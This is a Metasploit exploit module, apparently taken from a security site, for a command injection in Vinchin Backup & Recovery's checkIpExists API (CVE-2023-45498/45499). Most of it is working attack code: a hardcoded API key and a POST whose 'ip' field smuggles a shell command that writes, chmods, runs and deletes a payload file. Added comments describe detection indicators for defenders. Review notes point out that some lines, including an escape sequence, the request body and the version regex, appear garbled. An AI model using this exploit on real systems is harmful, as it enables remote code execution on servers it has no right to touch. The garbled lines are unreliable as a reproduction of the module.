Authored by Valentin Lobstein, Gregory Boddin | Site metasploit.com

This Metasploit module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user.

advisories | CVE-2023-45498, CVE-2023-45499

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for the Vinchin Backup & Recovery checkIpExists
# command injection (CVE-2023-45498 / CVE-2023-45499).
#
# Defender-relevant summary of what the code below does:
#   * check    -> one GET to login.php, version scraped from the page body
#   * exploit  -> one POST to api/?m=30&f=checkIpExists&k=<APIKEY> whose `p`
#                 body carries shell metacharacters, plus a short-lived file
#                 created and removed under FETCH_WRITABLE_DIR
# Both requests land in the web server access log (see 'SideEffects' below).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  # AutoCheck runs #check before #exploit, so a run against an unaffected
  # version is expected to stop at the version test rather than send the POST.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and datastore options.
  #
  # @param info [Hash] base module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Vinchin Backup and Recovery Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in Vinchin Backup & Recovery
          v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the
          checkIpExists API endpoint, an attacker can execute arbitrary commands as the
          web server user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Gregory Boddin (LeakIX)', # Vulnerability discovery
          'Valentin Lobstein' # Metasploit module
        ],
        'References' => [
          ['CVE', '2023-45498'],
          ['CVE', '2023-45499'],
          ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],
          ['URL', 'https://vinchin.com/'] # Vendor URL
        ],
        'DisclosureDate' => '2023-10-26',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          # Every request this module makes is an ordinary HTTP request to
          # login.php and api/, so it is visible in the nginx access log.
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'AKA' => ['Vinchin Command Injection']
        },
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          ['Automatic', {}]
        ],

        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          # Directory in which #exploit creates its temporary file; a
          # short-lived, randomly named 8-letter file here (mode 777) is the
          # on-disk artifact of a successful run.
          'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'
        },
        'Privileged' => false
      )
    )
    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),
        # The option text itself describes this default as a hardcoded key,
        # i.e. one the module expects to be accepted without per-install
        # configuration; whether that key is shared across installations is
        # not established by this file — confirm against the vendor advisory
        # before treating key rotation as a remediation step.
        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),
      ]
    )
  end

  # Delivers the command payload through the checkIpExists endpoint.
  #
  # Request shape (useful for writing a detection rule): POST to
  # <TARGETURI>api/ with query parameters m=30, f=checkIpExists, k=<APIKEY>
  # and a form body `p=` holding a JSON object whose "ip" value begins with
  # `a||` followed by the command. A legitimate "ip" value would never contain
  # `||`, `;`, `|` or `echo -e`, so those substrings in this parameter are a
  # reliable indicator.
  #
  # Host-side artifacts: a file named with 8 random letters is written into
  # FETCH_WRITABLE_DIR, chmod 777'd, executed, then removed — file-creation
  # auditing on that directory catches it even though the file is deleted.
  #
  # NOTE(review): several escape sequences in this copy look altered by the
  # page extraction — the `"\x#{x}"` fragment below and the `'data'` line,
  # which does not parse as Ruby with unescaped inner quotes. Compare with the
  # upstream module before relying on this text as an exact reproduction.
  def exploit
    # Payload bytes as a hex string, then re-split into two-character pairs.
    hex_encoded_payload = payload.encoded.unpack('H*').first
    formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\x#{x}" }.join

    # Random file name under the configured writable directory.
    temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"
    # Write, chmod, execute, delete — all in one injected command string.
    command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),
      'vars_get' => {
        'm' => '30',
        'f' => 'checkIpExists',
        'k' => datastore['APIKEY']
      },
      'data' => "p={"ip":"a||#{command}"}"
    })
  end

  # Version-based vulnerability check.
  #
  # Fetches login.php, requires HTTP 200, scrapes "Vinchin build: A.B.C.D" from
  # the body and compares it against the affected ranges.
  #
  # @return [CheckCode] Unknown when the page or version cannot be obtained,
  #   Appears for 5.0.x, 6.0.x, 6.7.x and 7.0.0–7.0.1, Safe otherwise
  def check
    target_uri_path = normalize_uri(target_uri.path, 'login.php')
    res = send_request_cgi('uri' => target_uri_path)

    return CheckCode::Unknown('Failed to connect to the target.') unless res
    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

    # NOTE(review): as reproduced here the pattern has lost its backslashes —
    # `d+.d+.d+.d+` matches literal d's, not digits. The intended pattern is
    # almost certainly /Vinchin build: (\d+\.\d+\.\d+\.\d+)/; with the text as
    # shown, every target would report "Unable to extract version."
    version_pattern = /Vinchin build: (d+.d+.d+.d+)/
    version_match = res.body.match(version_pattern)

    unless version_match && version_match[1]
      return CheckCode::Unknown('Unable to extract version.')
    end

    version = Rex::Version.new(version_match[1])
    print_status("Detected Vinchin version: #{version}")

    # Affected ranges are half-open: [5.0.0, 5.1.0), [6.0.0, 6.1.0),
    # [6.7.0, 6.8.0), [7.0.0, 7.0.2). The page does not state which release
    # fixed the issue; the 7.0.2 bound is taken from this code only.
    # The check cannot tell the two CVEs apart — it reports Appears for both.
    if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
       (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
       (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
       (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
      return CheckCode::Appears
    else
      return CheckCode::Safe
    end
  end
end